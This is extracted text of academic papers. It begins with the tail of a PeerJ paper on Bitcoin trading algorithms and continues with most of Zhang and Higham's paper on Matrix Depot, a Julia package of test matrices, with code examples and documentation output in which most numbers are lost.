• muhammad ovais ahmad conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft.
• mohammed a. alqarni conceived and designed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft.
• abdulwahab ali almazroi performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft.
• muhammad imran khan khalil performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft.
data availability the following information was supplied regarding data availability: data and code can found in the supplementary files. ahmad et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references abbey bs, doukas ja. . is technical analysis profitable forindividual currency traders? the journal of portfolio management ( ): – . ahmad i, schmidt g. . an experimental analysis of online unidirectional conver- sion problem. in: huemer c, lops p, eds. e-commerce and web technologies. berlin: springer berlin heidelberg, – . alessandretti l, elbahrawy a, aiello lm, baronchelli a. . anticipating cryptocurrency prices using machine learning. complexity : doi . / / . baur dg, dichtl h, drobetz w, wendt v-s. . investing in gold market tim- ing or buy-and-hold? international review of financial analysis : doi . /j.irfa. . . . brière m, oosterlinck k, szafarz a. . virtual currency, tangible return: port- folio diversification with bitcoin. journal of asset management ( ): – doi . /jam. . . brock w, lakonishok j, lebaron b. . simple technical trading rules and the stochastic properties of stock returns. the journal of finance ( ): – . chang y-h, jong c-c, wang s-c. . size, trading volume, and the profitability of technical trading. international journal of managerial finance ( ): – . coakley j, marzano m, nankervis j. . how profitable are fx technical trading rules? international review of financial analysis : – doi . /j.irfa. . . . el-yaniv r, fiat a, karp rm, turpin g. . optimal search and one-way trading online algorithms. algorithmica : – . fang j, jacobsen b, qin y. . predictability of the simple technical trading rules: an out-of-sample test. review of financial economics ( ): – doi . /j.rfe. . . . gunasekarage a, power dm. . the profitability of moving average trading rules in south asian stock markets. emerging markets review ( ): – doi . /s - ( ) - . hsu p-h, hsu y-c, kuan c-m. . testing the predictive ability of technical analysis using a new stepwise test without data snooping bias. journal of empirical finance ( ): – doi . /j.jempfin. . . . hsu p-h, taylor mp, wang z. . technical trading: is it still beating the foreign ex- change market? journal of international economics : – doi . /j.jinteco. . . . iqbal j, ahmad i. . optimal online k-min search. euro journal on computational optimization ( ): – . ahmad et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . / / http://dx.doi.org/ . /j.irfa. . . http://dx.doi.org/ . /jam. . http://dx.doi.org/ . /j.irfa. . . http://dx.doi.org/ . /j.rfe. . . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /j.jempfin. . . http://dx.doi.org/ . /j.jinteco. . . http://dx.doi.org/ . /peerj-cs. iqbal j, ahmad i, schmidt g. . can online trading algorithms beat the market? an experimental evaluation. in: rd student conference on operational research. wadern: schloss dagstuhl- leibniz-zentrum fuer informatik. iqbal j, ahmad i, shah a. . competitive algorithms for online conversion problem with interrelated prices. international journal of advanced computer science and applications ( ): – doi . /ijacsa. . . jiang f, tong g, song g. . 
technical analysis profitability without data snoop- ing bias: evidence from chinese stock market. international review of finance ( ): – doi . /irfi. . kao m-y, tate sr. . on-line difference maximization. siam journal on discrete mathematics ( ): – . menkhoff l, taylor mp. . the obstinate passion of foreign exchange professionals: technical analysis. journal of economic literature ( ): – . mohr e, ahmad i, schmidt g. . online algorithms for conversion problems: a survey. surveys in operations research and management science ( ): – . moore t. . the promise and perils of digital currencies. international journal of critical infrastructure protection ( ): – . nakamoto s. . bitcoin: a peer-to-peer electronic cash system. available at https: //bitcoin.org/bitcoin.pdf . narayanan a, bonneau j, felten e, miller a, goldfeder s. . bitcoin and cryptocur- rency technologies: a comprehensive introduction. princeton: princeton university press. nguyen t, de bodisco c, thaver r. . factors affecting bitcoin price in the cryp- tocurrency market: an empirical study. international journal of business & economics perspectives ( ) – . schmidt g, mohr e, kersch m. . experimental analysis of an online trading algorithm. electronic notes in discrete mathematics : – . schroeder p, dochow r, schmidt g. . optimal solutions for the online time series search and one-way trading problem with interrelated prices and a profit function. computers & industrial engineering : – doi . /j.cie. . . . strobel m, auer br. . does the predictive power of variable moving average rules vanish over time and can we explain such tendencies? international review of economics & finance : – doi . /j.iref. . . . uras n, marchesi l, marchesi m, tonelli r. . forecasting bitcoin closing price series using linear regression and neural networks models. peerj computer science :e doi . /peerj-cs. . wang s, vergne j-p. . buzz factor or innovation potential: what explains cryptocur- rencies returns? plos one ( ):e doi . /journal.pone. . Żbikowski k. . application of machine learning algorithms for bitcoin automated trading. in: ryzko d, gawrysiak p, kryszkiewicz m, rybiński h, eds. machine intelligence and big data in industry. cham: springer international publishing – doi . / - - - - _ . ahmad et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /ijacsa. . http://dx.doi.org/ . /irfi. https://bitcoin.org/bitcoin.pdf https://bitcoin.org/bitcoin.pdf http://dx.doi.org/ . /j.cie. . . http://dx.doi.org/ . /j.iref. . . http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /peerj-cs. zhu h, jiang z-q, li s-p, zhou w-x. . profitability of simple technical trading rules of chinese stock exchange indexes. physica a: statistical mechanics and its applications : – doi . /j.physa. . . . ahmad et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.physa. . . http://dx.doi.org/ . /peerj-cs. the university of manchester research matrix depot: an extensible test matrix collection for julia doi: . /peerj-cs. document version final published version link to publication record in manchester research explorer citation for published version (apa): zhang, w., & higham, n. (accepted/in press). matrix depot: an extensible test matrix collection for julia. peerj, (e ), - . https://doi.org/ . /peerj-cs. 
published in: peerj citing this paper please note that where the full-text provided on manchester research explorer is the author accepted manuscript or proof version this may differ from the final published version. if citing, it is advised that you check and use the publisher's definitive version. general rights copyright and moral rights for the publications made accessible in the research explorer are retained by the authors and/or other copyright owners and it is a condition of accessing publications that users recognise and abide by the legal requirements associated with these rights. takedown policy if you believe that this document breaches copyright please refer to the university of manchester’s takedown procedures [http://man.ac.uk/ y bo] or contact uml.scholarlycommunications@manchester.ac.uk providing relevant details, so we can investigate your claim. download date: . apr. https://doi.org/ . /peerj-cs. https://www.research.manchester.ac.uk/portal/en/publications/matrix-depot-an-extensible-test-matrix-collection-for-julia( b af d- - b- b -be ac ).html /portal/nick.higham.html https://www.research.manchester.ac.uk/portal/en/publications/matrix-depot-an-extensible-test-matrix-collection-for-julia( b af d- - b- b -be ac ).html https://doi.org/ . /peerj-cs. submitted december accepted march published april corresponding author nicholas j. higham, nick.higham@manchester.ac.uk academic editor ciro cattuto additional information and declarations can be found on page doi . /peerj-cs. copyright zhang and higham distributed under creative commons cc-by . open access matrix depot: an extensible test matrix collection for julia weijian zhang and nicholas j. higham school of mathematics, university of manchester, manchester, uk abstract matrix depot is a julia software package that provides easy access to a large and diverse collection of test matrices. its novelty is threefold. first, it is extensible by the user, and so can be adapted to include the user’s own test problems. in doing so, it facilitates experimentation and makes it easier to carry out reproducible research. second, it amalgamates in a single framework two different types of existing matrix collections, comprising parametrized test matrices (including hansen’s set of regularization test problems and higham’s test matrix toolbox) and real-life sparse matrix data (giving access to the university of florida sparse matrix collection). third, it fully exploits the julia language. it uses multiple dispatch to help provide a simple interface and, in particular, to allow matrices to be generated in any of the numeric data types supported by the language. subjects algorithms and analysis of algorithms, data science, scientific computing and simulation keywords julia, software package, test matrices, matrix algorithm., test problems introduction in , gregory and karney published a book of test matrices (gregory & karney, ). they stated that ‘‘in order to test the accuracy of computer programs for solving numerical problems, one needs numerical examples with known solutions. the aim of this monograph is to provide the reader with suitable examples for testing algorithms for finding the inverses, eigenvalues, and eigenvectors of matrix.’’ at that time it was common for journal papers to be devoted to introducing and analyzing a particular test matrix or class of matrices, examples being the papers of clement ( ) (in the first issue of siam review), pei ( ) (occupying just a quarter of a page), and gear ( ). 
today, test matrices remain of great interest, but not for the same reasons as fifty years ago. testing accuracy using problems with known solutions is less common because a reference solution correct to machine precision can usually be computed at higher precision without difficulty. the main uses of test matrices nowadays are for exploring the behavior of mathematical quantities (such as eigenvalue bounds) and for measuring the performance of one or more algorithms with respect to accuracy, stability, convergence rate, speed, or robustness. various collections of matrices have been made available in software. as well as giving easy access to matrices these collections have the advantage of facilitating reproducibility of experiments (donoho & stodden, ), whether by the same researcher months later or by different researchers. how to cite this article zhang and higham ( ), matrix depot: an extensible test matrix collection for julia. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:nick.higham@manchester.ac.uk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. the university of florida sparse matrix collection is to be renamed as the suitesparse matrix collection. an early collection of parametrizable matrices was given by higham ( ) and made available in matlab form. the collection was later extended and distributed as a matlab toolbox (higham, ). many of the matrices in the toolbox were subsequently incorporated into the matlab gallery function. marques, vömel, demmel, and parlett (marques et al., ) present test matrices for tridiagonal eigenvalue problems (already recognized as important by gregory and karney, who devoted the last chapter of their book to such matrices). the harwell–boeing collection of sparse matrices (duff, grimes & lewis, ) has been widely used, and is incorporated in the university of florida sparse matrix collection (davis & hu, ), which contains over matrices from practical applications, including standard and generalized eigenvalue problems from bai et al. ( ). among other matlab toolboxes we mention the contest toolbox (taylor & higham, ), which produces adjacency matrices describing random networks, and the nlevp collection of nonlinear eigenvalue problems (betcke et al., ). the purpose of this work is to provide a test matrix collection for julia (bezanson et al., ; bezanson et al., ), a new dynamic programming language for technical computing. the collection, called matrix depot, exploits julia’s multiple dispatch features to enable all matrices to be accessed by one simple interface. moreover, matrix depot is extensible. users can add matrices from the university of florida sparse matrix collection and matrix market; they can code new matrix generators and incorporate them into matrix depot; and they can define new groups of matrices that give easy access to subsets of matrices. 
the parametrized matrices can be generated in any appropriate numeric data type, such as • floating-point types float (half precision: bits), float (single precision: bits), and float (double precision: bits); • integer types int (signed -bit integers), uint (unsigned -bit integers), int (signed -bit integers), and uint (unsigned -bit integers); • complex, where the real and imaginary parts are of any real type (the same for both); • rational (ratio of integers); and • arbitrary precision type bigfloat (with default precision bits), which uses the gnu mpfr library (fousse et al., ). this paper is organized as follows. we start by giving a brief demonstration of matrix depot in ‘a taste of matrix depot.’ then we explain the design and implementation of matrix depot in ‘package design and implementation,’ giving details on how multiple dispatch is exploited; how the collection is stored, accessed, and documented; and how it can be extended. in ‘the matrices’ we describe the two classes of matrices in matrix depot: parametrized test matrices and real-life sparse matrix data. concluding remarks are given in the final section. zhang and higham ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. a taste of matrix depot to download matrix depot, in a julia repl (read-eval-print loop) run the command > pkg.add("matrixdepot") then import matrix depot into the local scope. > using matrixdepot now the package is ready to be used. first, we find out what matrices are in matrix depot. > matrixdepot() matrices: ) baart ) binomial ) blur ) cauchy ) chebspec ) chow ) circul ) clement ) companion ) deriv ) dingdong ) fiedler ) forsythe ) foxgood ) frank ) golub ) gravity ) grcar ) hadamard ) hankel ) heat ) hilb ) invhilb ) invol ) kahan ) kms ) lehmer ) lotkin ) magic ) minij ) moler ) neumann ) oscillate ) parallax ) parter ) pascal ) pei ) phillips ) poisson ) prolate ) randcorr ) rando ) randsvd ) rohess ) rosser ) sampling ) shaw ) spikes ) toeplitz ) tridiag ) triw ) ursell ) vand ) wathen ) wilkinson ) wing groups: all data eigen ill-cond inverse pos-def random regprob sparse symmetric all the matrices and groups in the collection are shown. it is also possible to obtain just the list of matrix names. > matrixdepot("all") -element array{asciistring, }: "baart" "binomial" "blur" "cauchy" "chebspec" "chow" "circul" "clement" "companion" "deriv " ... "spikes" "toeplitz" "tridiag" "triw" "ursell" "vand" "wathen" zhang and higham ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. "wilkinson" "wing" here, ‘‘ ...’’ denotes that we have omitted some of the output in order to save space. next, we check the input options of the hilbert matrix hilb. > matrixdepot("hilb") hilbert matrix ================ the hilbert matrix has (i,j) element /(i+j- ). it is notorious for being ill conditioned. it is symmetric positive definite and totally positive. input options: * [type,] dim: the dimension of the matrix. * [type,] row_dim, col_dim: the row and column dimensions. groups: ["inverse", "ill-cond", "symmetric", "pos-def"] references: m. d. choi, tricks or treats with the hilbert matrix, amer. math. monthly, ( ), pp. - . n. j. higham, accuracy and stability of numerical algorithms, second edition, society for industrial and applied mathematics, philadelphia, pa, usa, ; sec. . . note that an optional first argument type can be given; it defaults to float . 
The string of equals signs under the title in the hilb documentation output is Markdown notation for a header. Julia interprets Markdown within documentation, though as we are using typewriter font for code examples here, we display the uninterpreted source.

We generate a 4 x 4 Hilbert matrix with elements in the default double precision type and then in Rational type.

> matrixdepot("hilb", 4, 4)
4x4 Array{Float64,2}:
 1.0       0.5       0.333333  0.25
 0.5       0.333333  0.25      0.2
 0.333333  0.25      0.2       0.166667
 0.25      0.2       0.166667  0.142857

> matrixdepot("hilb", Rational, 4, 4)
4x4 Array{Rational{T<:Integer},2}:
 1//1  1//2  1//3  1//4
 1//2  1//3  1//4  1//5
 1//3  1//4  1//5  1//6
 1//4  1//5  1//6  1//7

A list of all the symmetric matrices in the collection is readily obtained.

> matrixdepot("symmetric")
21-element Array{ASCIIString,1}:
 "cauchy"
 "circul"
 "clement"
 "dingdong"
 "fiedler"
 "hankel"
 "hilb"
 "invhilb"
 "kms"
 "lehmer"
 "minij"
 "moler"
 "oscillate"
 "pascal"
 "pei"
 "poisson"
 "prolate"
 "randcorr"
 "tridiag"
 "wathen"
 "wilkinson"

Here, symmetric is one of several predefined groups, and multiple groups can be intersected. For example, the for loop below prints the smallest and largest eigenvalues of all the matrices of a given small dimension in Matrix Depot that are symmetric positive definite and (potentially) ill conditioned.

> for name in matrixdepot("symmetric", "pos-def", "ill-cond")
      A = full(matrixdepot(name, n))   # n is the dimension of the matrix
      @printf "%s: smallest eigval = %0.3e, largest eigval = %0.3e\n" name eigmin(A) eigmax(A)
  end

(The loop reports the extreme eigenvalues of cauchy, hilb, invhilb, kms, moler, oscillate, pascal, pei, and tridiag; the numerical values are omitted here.)

Matrices can also be accessed by number within the alphabetical list of matrix names.

> matrixdepot(2)
"binomial"

> matrixdepot(2:5)
4-element Array{AbstractString,1}:
 "binomial"
 "blur"
 "cauchy"
 "chebspec"

> matrixdepot(15:20, 5, 6, 1:3)
11-element Array{AbstractString,1}:
 "frank"
 "golub"
 "gravity"
 "grcar"
 "hadamard"
 "hankel"
 "chebspec"
 "chow"
 "baart"
 "binomial"
 "blur"

Access by number provides a convenient way to run a test on subsets of matrices in the collection. However, the number assigned to a matrix may change if we include new matrices in the collection. In order to run tests in a way that is repeatable in the future, it is best to group matrices into subsets using the macro @addgroup, which stores them by name. For example, the following command will group the test matrices frank, golub, gravity, grcar, hadamard, hankel, chebspec, chow, baart, binomial, and blur into a group called test.

> @addgroup test = matrixdepot(15:20, 5, 6, 1:3)

After reloading the package, we can run tests on these matrices using the group test. Here we compute the 2-norms. Since blur (an image deblurring test problem) generates a sparse matrix and the matrix 2-norm is currently not implemented for sparse matrices in Julia, we use full to convert the matrix to dense format.

> for name in matrixdepot("test")
      A = full(matrixdepot(name, n))
      @printf "%s has 2-norm %0.3e\n" name norm(A)
  end

(The loop prints the 2-norm of each of the eleven matrices in the group; the numerical values are omitted here.)
To download the test matrix SNAP/web-Google from the University of Florida sparse matrix collection (see 'Matrix data from external sources' for more details), we first download the data with

> matrixdepot("SNAP/web-Google", :get)

and then generate the matrix with

> matrixdepot("SNAP/web-Google", :r)

(A large sparse matrix with Float64 entries is returned; Julia prints only as many of the stored entries as fit in the terminal, marking the rest with "...".) Note that this omission is in this case done automatically by Julia based on the height of the terminal window. Matrices loaded in this way are inserted into the list of available matrices and assigned a number. After downloading three further matrices from the HB and Bova groups, the listing printed by matrixdepot() shows the 56 built-in generators as before, followed by the downloaded matrices under their full names (e.g., SNAP/web-Google), with the groups line unchanged.

Package design and implementation

In this section we describe the design and implementation of Matrix Depot, focusing particularly on the novel aspects of exploitation of multiple dispatch, extensibility of the collection, and user-definable grouping of matrices.

Exploiting multiple dispatch

Matrix Depot makes use of multiple dispatch in Julia, an object-oriented paradigm in which the selection of a function implementation is based on the types of each argument of the function. The generic function matrixdepot has eight different methods, where each method itself is a function that handles a specific case. This is neater and more convenient than writing eight "case" statements, as is necessary in many other languages.

> methods(matrixdepot)
# 8 methods for generic function "matrixdepot":
matrixdepot()
matrixdepot(name::AbstractString)
matrixdepot(name::AbstractString, method::Symbol)
matrixdepot(props::AbstractString...)
matrixdepot(name::AbstractString, args...)
matrixdepot(num::Integer)
matrixdepot(ur::UnitRange{T<:Real})
matrixdepot(vs::Union{Integer,UnitRange{T<:Real}}...)

For example, the following two functions are used for accessing matrices by number and by range respectively, where matrix_name_list() returns a list of matrix names. The second function calls the first function in the inner loop.
function matrixdepot(num::Integer)
    matrixstrings = matrix_name_list()
    n = length(matrixstrings)
    if num > n
        error("There are $(n) parameterized matrices, but you asked for the $(num)-th.")
    end
    return matrixstrings[num]
end

function matrixdepot(ur::UnitRange)
    matrixnamelist = AbstractString[]
    for i in ur
        push!(matrixnamelist, matrixdepot(i))
    end
    return matrixnamelist
end

As a result, matrixdepot is a versatile function that can be used for a variety of purposes, including returning matrix information and generating matrices from various input parameters. In the following example we see how multiple dispatch handles different numbers and types of arguments for the Cauchy matrix.

> matrixdepot("cauchy")
 Cauchy matrix
 =============
 Given two vectors x and y, the (i,j) entry of the Cauchy matrix is 1/(x[i]+y[j]).

 Input options:

 * [type,] x, y: two vectors.
 * [type,] x: a vector. y defaults to x.
 * [type,] dim: the dimension of the matrix. x and y default to [1:dim;].

 Groups: ["inverse", "ill-cond", "symmetric", "pos-def"]

 References:
 N. J. Higham, Accuracy and Stability of Numerical Algorithms, second edition,
 Society for Industrial and Applied Mathematics, Philadelphia, PA, USA.

The matrix can then be generated from two vectors, from a single vector (with y defaulting to x), from a dimension alone, or from an element type followed by a dimension:

> matrixdepot("cauchy", x, y)
> matrixdepot("cauchy", x)
> matrixdepot("cauchy", n)
> matrixdepot("cauchy", Float32, n)

In each case multiple dispatch selects the appropriate method and a dense Cauchy matrix is returned (numerical output omitted here).

Multiple dispatch is also exploited in programming the matrices. For example, the Hilbert matrix is implemented as

function hilb{T}(::Type{T}, m::Integer, n::Integer)
    H = zeros(T, m, n)
    for j = 1:n, i = 1:m
        @inbounds H[i,j] = one(T)/(i + j - one(T))
    end
    return H
end
hilb{T}(::Type{T}, n::Integer) = hilb(T, n, n)
hilb(args...) = hilb(Float64, args...)

The function hilb has three methods, which enable one to request, for example, hilb(Float32, n) for an n x n Hilbert matrix of type Float32, or simply (thanks to the final two lines) hilb(n) for an n x n Hilbert matrix of type Float64. The macro @inbounds tells Julia to turn off bounds checking in the following expression, in order to speed up execution. Note that in Julia it is not necessary to vectorize code to achieve good performance (Bezanson et al.).

All the matrices in Matrix Depot can be generated using the function call matrixdepot("matrix_name", p1, p2, ...), where matrix_name is the name of the test matrix and p1, p2, ... are input arguments depending on matrix_name. The help comments for each matrix can be viewed by calling matrixdepot("matrix_name"). We can access the list of matrix names by number, range, or a mixture of numbers and ranges:

1. matrixdepot(i) returns the name of the ith matrix;
2. matrixdepot(i:j) returns the names of the ith to jth matrices, where i < j;
3. matrixdepot(i:j, k, m) returns the names of the ith, (i+1)st, ..., jth, kth, and mth matrices.

Matrix representation

Matrix names in Matrix Depot are represented by Julia strings. For example, the Cauchy matrix is represented by "cauchy". Matrix names and matrix groups are stored as hash tables (Dict). In particular, there is a hash table matrixdict that maps each matrix name to its underlying function and a hash table matrixclass that maps each group to its members.
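Conceptually, the lookup works as in the following simplified sketch (our illustration only, not the package's actual source; matrixdict and matrixclass follow the text above, while the tiny helper generate is hypothetical):

# simplified picture of the two hash tables; hilb and cauchy stand for the
# package's generator functions
matrixdict  = Dict("hilb" => hilb, "cauchy" => cauchy)            # name  => generator function
matrixclass = Dict("symmetric" => ["hilb", "cauchy"],
                   "ill-cond"  => ["hilb", "cauchy"])             # group => member names

# generating a matrix by name then reduces to a dictionary lookup plus a call
generate(name, args...) = matrixdict[name](args...)
generate("hilb", 4)          # equivalent to hilb(4)

# and a group query is simply a lookup in matrixclass
matrixclass["symmetric"]     # ["hilb", "cauchy"]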
The majority of parametrized matrices are dense matrices of type Array{T,2}, where T is the element type of the matrix. Variables of the Array type are stored in column-major order. A few matrices are stored as sparse matrices (see also matrixdepot("sparse")), in the compressed sparse column (CSC) format; these include neumann (a singular matrix from the discrete Neumann problem) and poisson (a block tridiagonal matrix from Poisson's equation). Tridiagonal matrices are stored in the built-in Julia type Tridiagonal, which is defined as follows.

immutable Tridiagonal{T} <: AbstractMatrix{T}
    dl::Vector{T}    # sub-diagonal
    d::Vector{T}     # diagonal
    du::Vector{T}    # sup-diagonal
    du2::Vector{T}   # supsup-diagonal for pivoting
end

Matrix groups

A group is a subset of matrices in Matrix Depot. There are ten predefined groups, described in Table 1, most of which identify matrices with particular properties. Each group is represented by a string. For example, the group of random matrices is represented by "random". Matrices can be accessed by group names, as was illustrated in 'A taste of Matrix Depot.' The macro @addgroup is used to add a new group of matrices to Matrix Depot and the macro @rmgroup removes an added group.

Table 1: Predefined groups.

  all        all the matrices in the collection.
  data       the matrix has been downloaded from the University of Florida sparse collection or the Matrix Market collection.
  eigen      part of the eigensystem of the matrix is explicitly known.
  ill-cond   the matrix is ill-conditioned for some parameter values.
  inverse    the inverse of the matrix is known explicitly.
  pos-def    the matrix is positive definite for some parameter values.
  random     the matrix has random entries.
  regprob    the output is a test problem for regularization methods.
  sparse     the matrix is sparse.
  symmetric  the matrix is symmetric for some parameter values.

All the predefined matrix groups are stored in the hash table matrixclass. The macro @addgroup essentially adds a new key-value combination to the hash table usermatrixclass. Using a separate hash table prevents the user from contaminating the predefined matrix groups.

Being able to create groups is a useful feature for reproducible research (Donoho & Stodden). For example, if we have implemented an algorithm alg and we used circul, minij, and grcar as test matrices for alg, we could type

> @addgroup alg_group = ["circul", "minij", "grcar"]

This adds a new group to Matrix Depot (we need to reload the package to see the changes), and alg_group then appears at the end of the groups line printed by matrixdepot(). We can then run alg on the test matrices by

> for name in matrixdepot("alg_group")
      A = matrixdepot(name, n)   # n is the dimension of the matrix
      @printf "Test result for %s: ...\n" name   # run alg on A and report the result
  end

Adding new matrix generators

Generators are Julia functions that generate test matrices.
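For instance, a minimal generator following the same calling convention as the built-in ones (an optional element type followed by the dimension) could look like the sketch below; the name onesmat is ours and the function is purely illustrative, not part of the package:

# hypothetical generator: an n x n matrix of ones, in any element type
onesmat{T}(::Type{T}, n::Integer) = ones(T, n, n)
onesmat(n::Integer) = onesmat(Float64, n)   # default element type, as for the built-in generators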
When Matrix Depot is first loaded, a directory myMatrixDepot is created. It contains two files, group.jl and generator.jl, where group.jl is used for storing all the user-defined groups (see 'Matrix groups') and generator.jl is used for storing generator declarations.

(Git is a free and open source distributed version control system; Julia packages are simply Git repositories.) The directory myMatrixDepot is untracked by Git, so any local changes to files in myMatrixDepot do not make the MatrixDepot package "dirty." In particular, newly defined groups or matrix generators will not be affected when we upgrade to a new version of Matrix Depot. Matrix Depot automatically loads all Julia files in myMatrixDepot. This feature allows a user to simply drop generator files into myMatrixDepot without worrying about how to link them to Matrix Depot.

A new generator is declared using the syntax include_generator(FunctionName, "fname", f). This adds the new mapping "fname" -> f to the hash table matrixdict, which we recall maps each matrix name to its underlying function. Matrix Depot will refer to the function f by the string "fname", so that we can call f via matrixdepot("fname", ...). The user is free to define new data types and return values of those types. Moreover, as with any Julia function, multiple values can be returned by listing them after the return statement.

For example, suppose we have the following Julia file rand.jl, which contains two generators randsym and randorth, and we want to use them from Matrix Depot. The triple quotes in the file delimit the documentation for the functions.

"""
random symmetric matrix
=======================

Input options:

* n: the dimension of the matrix
"""
function randsym(n)
    A = zeros(n, n)
    for j = 1:n
        for i = 1:j
            A[i,j] = randn()
            if i != j; A[j,i] = A[i,j]; end
        end
    end
    return A
end

"""
random orthogonal matrix
========================

Input options:

* n: the dimension of the matrix
"""
randorth(n) = qr(randn(n,n))[1]

We can copy the file rand.jl to the directory myMatrixDepot and add the following two lines to generator.jl.

include_generator(FunctionName, "randsym", randsym)
include_generator(FunctionName, "randorth", randorth)

This includes the functions randsym and randorth in Matrix Depot, as we can see by looking at the matrix list printed by matrixdepot(): the listing now contains 58 names, with the new entries randorth and randsym numbered 43 and 45 in their alphabetical positions, and the groups line is unchanged. The new generators can be used just like the built-in ones.

> matrixdepot("randsym")
 random symmetric matrix
 =======================

 Input options:

 * n: the dimension of the matrix

> matrixdepot("randsym", 4)
(A 4 x 4 random symmetric matrix is returned; its entries change from run to run.)
> matrixdepot("randorth") random orthogonal matrix ======================== input options: * n: the dimension of the matrix > a = matrixdepot("randorth", ) x array{float , }: - . . . - . - . - . - . - . . . - . - . - . . . . > a’*a - eye( , ) x array{float , }: - . e- . e- - . e- - . e- zhang and higham ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. . e- - . e- - . e- . e- - . e- - . e- - . e- . e- - . e- . e- . e- . we can also add group information with the function include_generator. the following lines are put in generator.jl. include_generator(group, "random", randsym) include_generator(group, "random", randorth) this adds the functions randsym and randorth to the group random, as we can see with the following query (after reloading the package). > matrixdepot("random") -element array{asciistring, }: "golub" "oscillate" "randcorr" "rando" "randorth" "randsvd" "randsym" "rohess" "rosser" "wathen" documentation the matrix depot documentation is created using the documentation generator sphinx (http://sphinx-doc.org/) and is hosted at read the docs (http://matrixdepotjl.readthedocs. org). its primary goals are to provide examples of usage of matrix depot and to give a brief summary of each matrix in the collection. matrices are listed alphabetically with hyperlinks to the documentation for each matrix. most parametrized matrices are presented with heat map plots, which are produced using the winston package (https://github.com/nolta/winston.jl), with the color range determined by the smallest and largest entries of the matrix. for example, fig. shows how the wathen matrix is documented in matrix depot. the matrices we now describe the matrices that are provided with, or can be downloaded into, matrix depot. parametrized matrices in matrix depot v . . , there are parametrized matrices (including the regu- larization problems described in the next section), most of which originate from the test matrix toolbox (higham, ). all these matrices can be generated as matrixdepot("matrix_name", n), where n is the dimension of the matrix. many matrices can have more than one input parameter, and multiple dispatch provides a convenient mechanism for taking different actions for different argument types. for zhang and higham ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://sphinx-doc.org/ http://matrixdepotjl.readthedocs.org http://matrixdepotjl.readthedocs.org https://github.com/nolta/winston.jl http://dx.doi.org/ . /peerj-cs. figure documentation for the wathen matrix. example, the tridiag function generates a tridiagonal matrix from vector arguments giving the subdiagonal, diagonal, and superdiagonal vectors, but a tridiagonal toeplitz matrix can be obtained by supplying scalar arguments that specify the dimension of the matrix, the subdiagonal, the diagonal, and the superdiagonal. if a single, scalar argument n is supplied then an n-by- n tridiagonal toeplitz matrix with subdiagonal and superdiagonal − and diagonal is constructed. this matrix arises in applying central differences to a second derivative operator, and the inverse and the condition number are known explicitly (higham, , sec. . ). here is an example of the different usages of tridiag. > matrixdepot("tridiag") tridiagonal matrix ==================== construct a tridiagonal matrix of type tridiagonal. zhang and higham ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. 
 Input options:

 * [type,] v1, v2, v3: v1 and v3 are vectors of subdiagonal and superdiagonal
   elements, respectively, and v2 is a vector of diagonal elements.
 * [type,] dim, x, y, z: dim is the dimension of the matrix; x, y, z are scalars.
   x and z are the subdiagonal and superdiagonal elements, respectively, and y is
   the diagonal element.
 * [type,] dim: x = -1, y = 2, z = -1. This matrix is also known as the second
   difference matrix.

 Groups: ["inverse", "ill-cond", "pos-def", "eigen"]

 References:
 J. Todd, Basic Numerical Mathematics, Vol. 2: Numerical Algebra, Birkhauser,
 Basel, and Academic Press, New York.

The matrix can thus be generated from three vectors, from a dimension plus three scalars, or, as below, from an element type and a dimension alone, which gives the second difference matrix.

> matrixdepot("tridiag", v1, v2, v3)   # from three vectors
> matrixdepot("tridiag", n, x, y, z)   # tridiagonal Toeplitz matrix
> matrixdepot("tridiag", Int, 4)       # second difference matrix with Int entries
4x4 Tridiagonal{Int64}:
  2  -1   0   0
 -1   2  -1   0
  0  -1   2  -1
  0   0  -1   2

Test problems for regularization methods

A mathematical problem is ill-posed if the solution is not unique or if an arbitrarily small perturbation of the data can cause an arbitrarily large change in the solution. Regularization methods are an important class of methods for dealing with such problems (Hansen). One means of generating test problems for regularization methods is to discretize a given ill-posed problem. Matrix Depot contains a group of regularization test problems derived from Hansen's MATLAB Regularization Tools (Hansen) that are mostly discretizations of Fredholm integral equations of the first kind:

\int_0^1 K(s,t)\, f(t)\, dt = g(s), \qquad 0 \le s \le 1.

The regularization test problems form the group regprob.

> matrixdepot("regprob")
12-element Array{ASCIIString,1}:
 "baart"
 "blur"
 "deriv2"
 "foxgood"
 "gravity"
 "heat"
 "parallax"
 "phillips"
 "shaw"
 "spikes"
 "ursell"
 "wing"

Each problem is a linear system Ax = b, where the matrix A and vectors x and b are obtained by discretization (using quadrature or the Galerkin method) of K, f, and g. By default, we generate only A, which is an ill-conditioned matrix. The whole test problem will be generated if the parameter matrixonly is set to false, and in this case the output has type RegProb, which is defined as

immutable RegProb{T}
    A::AbstractMatrix{T}   # matrix of interest
    b::AbstractVector{T}   # right-hand side
    x::AbstractVector{T}   # the solution to Ax = b
end

